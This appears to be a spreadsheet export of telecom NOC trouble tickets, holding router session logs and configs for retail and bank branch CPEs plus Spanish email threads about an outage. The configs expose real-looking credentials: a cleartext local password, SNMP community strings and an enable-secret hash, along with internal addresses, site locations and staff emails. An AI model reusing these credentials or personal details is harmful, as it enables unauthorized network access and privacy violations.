!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.201.11.17 PING STATISTICS ---
    1500 PACKET(S) TRANSMITTED
    1500 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 3/3/221 MS
&lt;HHERCRMPN1W1N01O01EIM1&gt;TELNET VPN DATOS_WALMART 10.201.11.17
TRYING 10.201.11.17 ...
PRESS CTRL+K TO ABORT
CONNECTED TO 10.201.11.17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
  USERNAME TIMEOUT EXPIRED
USERNAME:CLAROCR
PASSWORD:
  -----------------------------------------------------------------------------
  USER LAST LOGIN INFORMATION:
  -----------------------------------------------------------------------------
  ACCESS TYPE: TELNET
  IP-ADDRESS : 10.201.11.1
  TIME       : 2022-04-07 16:19:37-06:00
  -----------------------------------------------------------------------------
&lt;CC_WALMART_CR_TIENDA_4340&gt;ENA
                           ^
ERROR: UNRECOGNIZED COMMAND FOUND AT '^' POSITION.
&lt;CC_WALMART_CR_TIENDA_4340&gt;SIS
                           ^
ERROR: UNRECOGNIZED COMMAND FOUND AT '^' POSITION.
&lt;CC_WALMART_CR_TIENDA_4340&gt;SYS
ENTER SYSTEM VIEW, RETURN USER VIEW WITH CTRL+Z.
[CC_WALMART_CR_TIENDA_4340]QUI
&lt;CC_WALMART_CR_TIENDA_4340&gt;DIS CUR
[V200R008C20SPC800]
#
 SYSNAME CC_WALMART_CR_TIENDA_4340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UNDO ICMP-REPLY FAST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2.4.184 0.0.0.3
#
ACL NAME TELNET 3999
 RULE 10 PERMIT IP SOURCE 10.0.0.0 0.255.255.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OV5I8UZL#;D:CVXZ;Z)B/.EV2^1E9#)DD.OOXZF6HUMKPN,-J4M;|R;D~O/&gt;%^%#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ETHERNET0/0/0
 DESCRIPTION LIBRE
 SHUTDOWN
#
INTERFACE GIGABITETHERNET0/0/0
 UNDO PORTSWITCH
 DESCRIPTION WAN_PRINCIPAL_CONTR0001396494OC
 SET FLOW-STAT INTERVAL 10
 BANDWIDTH 4
 UNDO ICMP HOST-UNREACHABLE SEND
 UNDO ICMP PORT-UNREACHABLE SEND
 UNDO ICMP TTL-EXCEEDED SEND
 UNDO NEGOTIATION AUTO
#
INTERFACE GIGABITETHERNET0/0/0.1104
 DESCRIPTION WAN_PUNTO_VENTA_HACIA_MTR105
 DOT1Q TERMINATION VID 1104
 IP ADDRESS 10.201.11.17 255.255.255.192
#
INTERFACE GIGABITETHERNET0/0/0.2104
 DESCRIPTION WAN_PUNTO_VENTA_HACIA_MTR488
 DOT1Q TERMINATION VID 2104
 IP ADDRESS 10.201.41.17 255.255.255.192
#
INTERFACE GIGABITETHERNET0/0/1
 UNDO PORTSWITCH
 DESCRIPTION LAN DEL CLIENTE
 SET FLOW-STAT INTERVAL 10
 IP ADDRESS 22.32.4.185 255.255.255.252
 OSPF NETWORK-TYPE P2P
 OSPF TIMER DEAD 60
 UNDO NEGOTIATION AUTO
 SPEED 1000
#
INTERFACE GIGABITETHERNET0/0/2
 DESCRIPTION LIBRE
 SHUTDOWN
#
INTERFACE GIGABITETHERNET0/0/3
 DESCRIPTION LIBRE
 SHUTDOWN
#
INTERFACE GIGABITETHERNET0/0/4
 DESCRIPTION LIBRE
 SHUTDOWN
#
INTERFACE GIGABITETHERNET0/0/5
 DESCRIPTION LIBRE
 SHUTDOWN
 IP ADDRESS DHCP-ALLOC
#
INTERFACE WLAN-BSS7
 DESCRIPTION LIBRE
#
INTERFACE CELLULAR0/0/0
 DESCRIPTION LIBRE
 SHUTDOWN
#
INTERFACE CELLULAR0/0/1
 DESCRIPTION LIBRE
 SHUTDOWN
#
INTERFACE NULL0
 DESCRIPTION LIBRE
#
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.99.75.195 255.255.255.255
#
BGP 64525
 ROUTER-ID 10.99.75.243
 PEER 10.201.11.1 AS-NUMBER 14754
 PEER 10.201.41.1 AS-NUMBER 14754
 #
 IPV4-FAMILY UNICAST
  UNDO SYNCHRONIZATION
  NETWORK 10.99.75.243 255.255.255.255
  IMPORT-ROUTE OSPF 65410
  PEER 10.201.11.1 ENABLE
  PEER 10.201.11.1 ROUTE-POLICY LOCAL_PREFERENCE IMPORT
  PEER 10.201.11.1 ROUTE-POLICY LOCAL_PREFERENCE EXPORT
  PEER 10.201.11.1 NEXT-HOP-LOCAL
  PEER 10.201.41.1 ENABLE
  PEER 10.201.41.1 NEXT-HOP-LOCAL
#
OSPF 65410
 DEFAULT-ROUTE-ADVERTISE
 IMPORT-ROUTE DIRECT
 IMPORT-ROUTE OSPF 450
 AREA 0.0.0.0
  NETWORK 22.32.4.184 0.0.0.3
#
ROUTE-POLICY OSPF_DATOS_WALMART PERMIT NODE 10
 IF-MATCH ACL 2999
#
ROUTE-POLICY LOCAL_PREFERENCE PERMIT NODE 10
 APPLY LOCAL-PREFERENCE 200
#
CPU-DEFEND POLICY ICMP
 PACKET-TYPE ICMP RATE-LIMIT 1500
#
 CPU-DEFEND-POLICY ICMP
#
 SNMP-AGENT LOCAL-ENGINEID 800007DB03F898EF716D91
 SNMP-AGENT COMMUNITY READ %^%#"&amp;7*O`E_\C5/4"5Q4&lt;&amp;@PCF{GV*TA6.KSI&lt;:9IF.H"$~&gt;GB&lt;"C@BRLFOLU7D=/|(JH1)A8EJ&gt;J4^GHA7%^%# ACL 2988
 SNMP-AGENT COMMUNITY READ %^%#VHPXM6=PO2GLYFL&amp;2L1#K:^0/QD0{ME_QT8|RJZOPZ#-0}TQOWEBN.N#}G@CEH.I#&gt;(&lt;M@P-J$=D3OX"%^%#
 SNMP-AGENT COMMUNITY READ %^%#AHORH&gt;DD2YWE@{S5GZ_E;^|V@1DWH48H*GK)1^I&gt;:BD"JCCL&lt;"0HB3PM,.~6NNRTM,FIMWP-IZV`JQPI%^%#
 SNMP-AGENT SYS-INFO LOCATION MAXI PALI OROTINA - 200 MTS NORTTE DE MEGASUPER ENTRADA PRINCIPAL OROTINA
 SNMP-AGENT SYS-INFO VERSION V2C
 SNMP-AGENT TRAP SOURCE LOOPBACK5
 SNMP-AGENT
#
 STELNET SERVER ENABLE
 TELNET SERVER ENABLE
#
 HTTP SECURE-SERVER SSL-POLICY DEFAULT_POLICY
 HTTP SERVER ENABLE
 HTTP SECURE-SERVER EN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
INTERFACE WLAN-RADIO0/0/1
 DESCRIPTION LIBRE
#
DOT1X-ACCESS-PROFILE NAME DOT1X_ACCESS_PROFILE
#
MAC-ACCESS-PROFILE NAME MAC_ACCESS_PROFILE
#
 NTP-SERVICE UNICAST-PEER 10.201.41.1
 NTP-SERVICE UNICAST-PEER 10.201.11.1
#
VOICE
 #
 DIAGNOSE
#
OPS
#
AUTOSTART
#
RETURN
&lt;CC_WALMART_CR_TIENDA_4340&gt; DIS ARP
IP ADDRESS      MAC ADDRESS     EXPIRE(M) TYPE        INTERFACE   VPN-INSTANCE
                                          VLAN/CEVLAN PVC
------------------------------------------------------------------------------
22.32.4.185     F898-EF71-6D91            I -         GE0/0/1
22.32.4.186     FC99-4792-0A6B  20        D-0         GE0/0/1
10.201.11.17    F898-EF71-6D91            I -         GE0/0/0.1104
10.201.11.1     505D-AC64-7F7C  20        D-0         GE0/0/0.1104
                                          1104/-
10.201.41.17    F898-EF71-6D91            I -         GE0/0/0.2104
10.201.41.1     F4DE-AF06-70A8  20        D-0         GE0/0/0.2104
                                          2104/-
------------------------------------------------------------------------------
TOTAL:6         DYNAMIC:3       STATIC:0     INTERFACE:3
&lt;CC_WALMART_CR_TIENDA_4340&gt;DIS IP INT BRIE
*DOWN: ADMINISTRATIVELY DOWN
^DOWN: STANDBY
(L): LOOPBACK
(S): SPOOFING
(E): E-TRUNK DOWN
THE NUMBER OF INTERFACE THAT IS UP IN PHYSICAL IS 6
THE NUMBER OF INTERFACE THAT IS DOWN IN PHYSICAL IS 5
THE NUMBER OF INTERFACE THAT IS UP IN PROTOCOL IS 5
THE NUMBER OF INTERFACE THAT IS DOWN IN PROTOCOL IS 6
INTERFACE                         IP ADDRESS/MASK      PHYSICAL   PROTOCOL
CELLULAR0/0/0                     UNASSIGNED           *DOWN      DOWN
CELLULAR0/0/1                     UNASSIGNED           *DOWN      DOWN
ETHERNET0/0/0                     UNASSIGNED           *DOWN      DOWN
GIGABITETHERNET0/0/0              UNASSIGNED           UP         DOWN
GIGABITETHERNET0/0/0.1104         10.201.11.17/26      UP         UP
GIGABITETHERNET0/0/0.2104         10.201.41.17/26      UP         UP
GIGABITETHERNET0/0/1              22.32.4.185/30       UP         UP
GIGABITETHERNET0/0/4              UNASSIGNED           *DOWN      DOWN
GIGABITETHERNET0/0/5              UNASSIGNED           *DOWN      DOWN
LOOPBACK5                         10.99.75.195/32      UP         UP(S)
NULL0                             UNASSIGNED           UP         UP(S)
&lt;CC_WALMART_CR_TIENDA_4340&gt;DIS INTE DES
PHY: PHYSICAL
*DOWN: ADMINISTRATIVELY DOWN
(L): LOOPBACK
(S): SPOOFING
(B): BFD DOWN
^DOWN: STANDBY
(E): ETHOAM DOWN
INTERFACE                     PHY     PROTOCOL DESCRIPTION
CELL0/0/0                     *DOWN   DOWN     LIBRE
CELL0/0/1                     *DOWN   DOWN     LIBRE
ETH0/0/0                      *DOWN   DOWN     LIBRE
GE0/0/0                       UP      DOWN     WAN_PRINCIPAL_CONTR0001396494OC
GE0/0/0.1104                  UP      UP       WAN_PUNTO_VENTA_HACIA_MTR105
GE0/0/0.2104                  UP      UP       WAN_PUNTO_VENTA_HACIA_MTR488
GE0/0/1                       UP      UP       LAN DEL CLIENTE
GE0/0/2                       *DOWN   DOWN     LIBRE
GE0/0/3                       *DOWN   DOWN     LIBRE
GE0/0/4                       *DOWN   DOWN     LIBRE
GE0/0/5                       *DOWN   DOWN     LIBRE
LOOP5                         UP      UP(S)    MONITOREO DEL CNOC
NULL0                         UP      UP(S)    LIBRE
WLAN-BSS7                     UP      UP       LIBRE
WLAN0/0/0                     UP      UP       LIBRE
WLAN0/0/1                     UP      UP       LIBRE
&lt;CC_WALMART_CR_TIENDA_4340&gt;</t>
  </si>
  <si>
    <t>***--- CL CONFIRMA QUE SE DESCARTA TEMA DE ENERGIA POR LO QUE SE SOLICITA CONTACTOS EN SITIO Y HORARIO -***
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: DOMINGO, 29 DE MAYO DE 2022 04:25
PARA: MALAQUIAS PANJOJ (VENDOR) &lt;MALAQUIAS.PANJOJ@WALMART.COM&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; SAUL ORELLANA (VENDOR) &lt;SAUL.ORELLANA0@WALMART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
ASUNTO: RE: ENLACE CAÍDO DE MAXI PALI OROTINA ID: CONTR0001396494OC
BUENOS DÍAS ESTIMADO SR. MALAQUIAS.
                GRACIAS POR LA INFORMACIÓN, ADJUNTO CORREO DE SEGUIMIENTO POR PARTE DEL PERSONAL DEL CNOC.
ELLOS NOS INDICA QUE LUEGO DEL DESCARTE DE ENERGÍA Y CONEXIONES SI ES POSIBLE COMPARTIRNOS LOS SIGUIENTES DATOS.
*CONTACTO LOCAL
*DIRECCIÓN DEL SITIO
*HORARIO DE ATENCIÓN
*REGISTRO FOTOGRÁFICO DEL EQUIPO
SALUDOS.
DE: MALAQUIAS PANJOJ (VENDOR) [MAILTO:MALAQUIAS.PANJOJ@WALMART.COM]
ENVIADO EL: DOMINGO, 29 DE MAYO DE 2022 04:18
PARA: CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; SAUL ORELLANA (VENDOR) &lt;SAUL.ORELLANA0@WALMART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
ASUNTO: RE: ENLACE CAÍDO DE MAXI PALI OROTINA ID: CONTR0001396494OC
BUENOS DÍAS;
SE DESCARTE TEMA ELÉCTRICO EN SITIO. FAVOR DE APOYAR CON REVISIÓN Y NOS COMPARTEN LOS AVANCES.
SALUDOS!</t>
  </si>
  <si>
    <t>***--- CL COMENTA QUE CONTACTARAN AL PR A LAS 07:00 HRS Y RETOMARAN LA COMUNICACIÓN CON CLARO A LAS 08:00 ---*
DE: MALAQUIAS PANJOJ (VENDOR) [MAILTO:MALAQUIAS.PANJOJ@WALMART.COM]
ENVIADO EL: DOMINGO, 29 DE MAYO DE 2022 04:33
PARA: EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; SAUL ORELLANA (VENDOR) &lt;SAUL.ORELLANA0@WALMART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
ASUNTO: RE: ENLACE CAÍDO DE MAXI PALI OROTINA ID: CONTR0001396494OC
BUENOS DÍAS;
DEBIDO A QUE SITIO SE ENCUENTRA CERRADO, RETOMAREMOS EL TEMA A LAS 07:00 AM PARA DESCARTES DE L1, AGRADECERÍAMOS NOS CONTACTEN A LAS 08:00 HRS Y DE SER NECESARIO REALIZAR PRUEBAS EN CONJUNTO.
SALUDOS!</t>
  </si>
  <si>
    <t>F4581979</t>
  </si>
  <si>
    <t xml:space="preserve">
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO SE TIENE UNA ALARMA DE ENERGIA HACE 8 MINUTOS SE PROCEDE CON CIERRE.
SE OBSERVA UNA ALARMA DE ENERGIA RECIENTE (HACE: 5 MINUTOS)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CREDOMATIC_GT_INTERNET_PLAZA_VARIETA UPTIME IS 5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9005D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CREDOMATIC_GT_INTERNET_PLAZA_VARIETA#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 3594 BYTES
!
VERSION 15.6
NO SERVICE PAD
SERVICE TIMESTAMPS DEBUG DATETIME MSEC
SERVICE TIMESTAMPS LOG DATETIME MSEC
NO SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_CREDOMATIC_GT_INTERNET_PLAZA_VARIETA
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 5 $1$MCCX$CP.VRSF9ZK.SBJQDU9Y2X0
!
NO AAA NEW-MODEL
WAN MODE ETHERNET
!
!
!
IP DHCP EXCLUDED-ADDRESS 190.149.59.137
IP DHCP EXCLUDED-ADDRESS 192.168.0.1
!
IP DHCP POOL LAN
 NETWORK 192.168.0.0 255.255.255.0
 DEFAULT-ROUTER 192.168.0.1
 DNS-SERVER 216.230.147.90 216.230.128.32
!
!
!
IP CEF
NO IPV6 CEF
!
!
!
!
!
!
!
!
!
!
!
!
!
USERNAME GESTIONIP PASSWORD 0 NE7W0RK$
!
!
CONTROLLER VDSL 0
 SHUTDOWN
!
!
!
!
!
!
!
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.198.236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INTERFACE ACTUALMENTE NO ESTA EN USO
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0
 DESCRIPTION INTERFACE ACTUALMENTE NO ESTA EN USO
 NO IP ADDRESS
!
INTERFACE GIGABITETHERNET1
 DESCRIPTION LAN DEL CLIENTE
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET2
 DESCRIPTION WAN PRINCIPAL/_/8600202T/_/
 BANDWIDTH 5120
 IP ADDRESS 10.78.253.177 255.255.255.224
 IP NAT OUTSIDE
 IP VIRTUAL-REASSEMBLY IN
 LOAD-INTERVAL 30
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE VLAN1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 192.168.0.1 255.255.255.0 SECONDARY
 IP ADDRESS 190.149.59.137 255.255.255.252
 IP NAT INSIDE
 IP VIRTUAL-REASSEMBLY IN
 RATE-LIMIT INPUT 5120000 640000 1280000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 5120000 640000 1280000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 NO AUTOSTATE
!
IP FORWARD-PROTOCOL ND
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
!
IP NAT INSIDE SOURCE LIST 101 INTERFACE VLAN1 OVERLOAD
IP ROUTE 0.0.0.0 0.0.0.0 10.78.253.161
IP SSH SERVER ALGORITHM ENCRYPTION AES128-CTR AES192-CTR AES256-CTR
IP SSH CLIENT ALGORITHM ENCRYPTION AES128-CTR AES192-CTR AES256-CTR
!
!
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER LOCATION INTERNET_22 CALLE 3-05 CENTRO COMERCIAL PLAZA VARIETA LOCAL 20 Y 21 ZONA 16 GUATEMALA
ACCESS-LIST 88 REMARK MONITOREO DE CLARO
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
ACCESS-LIST 101 PERMIT IP 192.168.0.0 0.0.0.255 ANY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NO MODEM ENABLE
 TRANSPORT OUTPUT ALL
LINE AUX 0
LINE 2
 NO ACTIVATION-CHARACTER
 NO EXEC
 TRANSPORT PREFERRED NONE
 TRANSPORT INPUT ALL
 STOPBITS 1
LINE VTY 0 4
 LOGGING SYNCHRONOUS
 LOGIN LOCAL
 TRANSPORT INPUT ALL
!
SCHEDULER ALLOCATE 60000 1000
!
END
CC_CREDOMATIC_GT_INTERNET_PLAZA_VARIETA#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 3 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 38 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 39 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (8192 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
    TRAP LOGGING: LEVEL INFORMATIONAL, 40 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
LOG BUFFER (8192 BYTES):
*MAY 29 03:37:42.355: PIM: BFD INITIALIZATION FAILED
*MAY 29 03:37:45.051: %VPN_HW-6-INFO_LOC: CRYPTO ENGINE: ONBOARD 0  STATE CHANGED TO: INITIALIZED
*MAY 29 03:37:45.055: %VPN_HW-6-INFO_LOC: CRYPTO ENGINE: ONBOARD 0  STATE CHANGED TO: ENABLED
*MAY 29 03:37:55.779: %LINK-3-UPDOWN: INTERFACE ETHERNET0, CHANGED STATE TO DOWN
*MAY 29 03:37:55.779: %LINK-3-UPDOWN: INTERFACE ATM0, CHANGED STATE TO DOWN
*MAY 29 03:37:55.779: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VOIP-NULL0, CHANGED STATE TO UP
*MAY 29 03:37:55.783: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET2, CHANGED STATE TO DOWN
*MAY 29 03:37:55.783: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE ONBOARD VPN, CHANGED STATE TO UP
*MAY 29 03:37:56.295: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO DOWN
*MAY 29 03:37:57.431: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE ETHERNET0, CHANGED STATE TO DOWN
*MAY 29 03:37:57.431: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE ATM0, CHANGED STATE TO DOWN
*MAY 29 03:37:57.431: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET2, CHANGED STATE TO DOWN
*MAY 29 03:38:02.671: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK5, CHANGED STATE TO UP
*MAY 29 03:38:02.835: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
*MAY 29 03:38:03.235: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE NVI0, CHANGED STATE TO UP
*MAY 29 03:38:03.235: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET2, CHANGED STATE TO UP
*MAY 29 03:38:03.691: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO UP
*MAY 29 03:38:03.691: %LINK-5-CHANGED: INTERFACE ATM0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*MAY 29 03:38:03.803: %LINK-5-CHANGED: INTERFACE ETHERNET0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*MAY 29 03:38:03.803: %LINK-5-CHANGED: INTERFACE FASTETHERNET0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*MAY 29 03:38:03.803: %LINK-5-CHANGED: INTERFACE FASTETHERNET1, CHANGED STATE TO ADMINISTRATIVELY DOWN
*MAY 29 03:38:03.803: %LINK-5-CHANGED: INTERFACE FASTETHERNET2, CHANGED STATE TO ADMINISTRATIVELY DOWN
*MAY 29 03:38:03.803: %LINK-5-CHANGED: INTERFACE GIGABITETHERNET1, CHANGED STATE TO ADMINISTRATIVELY DOWN
*MAY 29 03:38:04.035: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE, C860 SOFTWARE (C860VAE2-ADVSECK9-M), VERSION 15.6(3)M3A, RELEASE SOFTWARE (FC2)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2017 BY CISCO SYSTEMS, INC.
COMPILED TUE 19-SEP-17 00:39 BY PROD_REL_TEAM
*MAY 29 03:38:04.039: %SNMP-5-COLDSTART: SNMP AGENT ON HOST CC_CREDOMATIC_GT_INTERNET_PLAZA_VARIETA IS UNDERGOING A COLD START
*MAY 29 03:38:04.083: %CRYPTO-6-ISAKMP_ON_OFF: ISAKMP IS OFF
*MAY 29 03:38:04.263: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET2, CHANGED STATE TO UP
*MAY 29 03:38:04.811: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0, CHANGED STATE TO DOWN
*MAY 29 03:38:04.811: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET1, CHANGED STATE TO DOWN
*MAY 29 03:38:04.811: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET2, CHANGED STATE TO DOWN
*MAY 29 03:38:04.811: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET1, CHANGED STATE TO DOWN
*MAY 29 03:38:04.839: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*MAY 29 03:38:05.987: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0, CHANGED STATE TO UP
*MAY 29 03:38:05.987: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE WLAN-GIGABITETHERNET0, CHANGED STATE TO UP
*MAY 29 03:38:08.287: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO UP
*MAY 29 03:38:19.051: %BOOT SECOND FIRMWARE WITH EMBEDDED BINARY.
*MAY 29 03:38:19.211: %BOOT SECOND CORE FIRMWARE
*MAY 29 03:38:31.455: %CONTROLLER-5-UPDOWN: CONTROLLER VDSL 0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*MAY 29 03:38:55.491: %SYS-6-STACKLOW: STACK FOR LEVEL GENERAL INTERRUPT RUNNING LOW, 0/9000
CC_CREDOMATIC_GT_INTERNET_PLAZA_VARIETA#
SHOW CLOCK
*03:42:36.731 UTC SUN MAY 29 2022
CC_CREDOMATIC_GT_INTERNET_PLAZA_VARIETA#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.78.253.161           4   DC99.147A.A579  ARPA   GIGABITETHERNET2
INTERNET  10.78.253.177           -   4C71.0C9D.9295  ARPA   GIGABITETHERNET2
INTERNET  190.149.59.137          -   4C71.0C9D.9290  ARPA   VLAN1
INTERNET  190.149.59.138          0   INCOMPLETE      ARPA
INTERNET  192.168.0.1             -   4C71.0C9D.9290  ARPA   VLAN1
INTERNET  192.168.0.2             0   683A.1E34.F6FF  ARPA   VLAN1
CC_CREDOMATIC_GT_INTERNET_PLAZA_VARIETA#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
AT0                            ADMIN DOWN     DOWN
ET0                            ADMIN DOWN     DOWN
FA0                            ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
FA1                            ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
FA2                            ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
GI0                            UP             UP       INTERFACE ACTUALMENTE NO ESTA EN USO
GI1                            ADMIN DOWN     DOWN     LAN DEL CLIENTE
GI2                            UP             UP       WAN PRINCIPAL/_/8600202T/_/
LO5                            UP             UP       MONITOREO DEL CNOC
NV0                            UP             UP
VL1                            UP             UP       LAN DEL CLIENTE
CC_CREDOMATIC_GT_INTERNET_PLAZA_VARIETA#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UP                    UP
GIGABITETHERNET1           UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET2           10.78.253.177   YES NVRAM  UP                    UP
LOOPBACK5                  10.212.198.236  YES NVRAM  UP                    UP
NVI0                       10.78.253.177   YES UNSET  UP                    UP
VLAN1                      190.149.59.137  YES NVRAM  UP                    UP
CC_CREDOMATIC_GT_INTERNET_PLAZA_VARIETA#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN INTERNET_GT_METRO 10.78.253.177
  PING 10.78.253.177: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.78.253.177 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/4 MS
RUTA IP:
PE: 10.179.28.42
DISPLAY IP ROUTING-TABLE VPN-INSTANCE INTERNET_GT_METRO 10.78.253.177
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : INTERNET_GT_METRO
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.78.253.177/32  DIRECT  0    0                 0.0.0.0         VLANIF3740			</t>
  </si>
  <si>
    <t>F4581992</t>
  </si>
  <si>
    <t>SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO SE PORCEDE CONCIERRE POR ENERGIA COMERCIAL .
NO SE TIENE GESTION DEL CPE
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN INTERNET_GT_DEPTAL 10.87.230.34
  PING 10.87.230.34: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.87.230.34 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
RUTA IP:
PE: 10.179.28.71
DISPLAY IP ROUTING-TABLE VPN-INSTANCE INTERNET_GT_DEPTAL 10.87.230.34
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : INTERNET_GT_DEPTAL
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.87.230.34/32  DIRECT  0    0                 0.0.0.0         VLANIF3750</t>
  </si>
  <si>
    <t>F4582014</t>
  </si>
  <si>
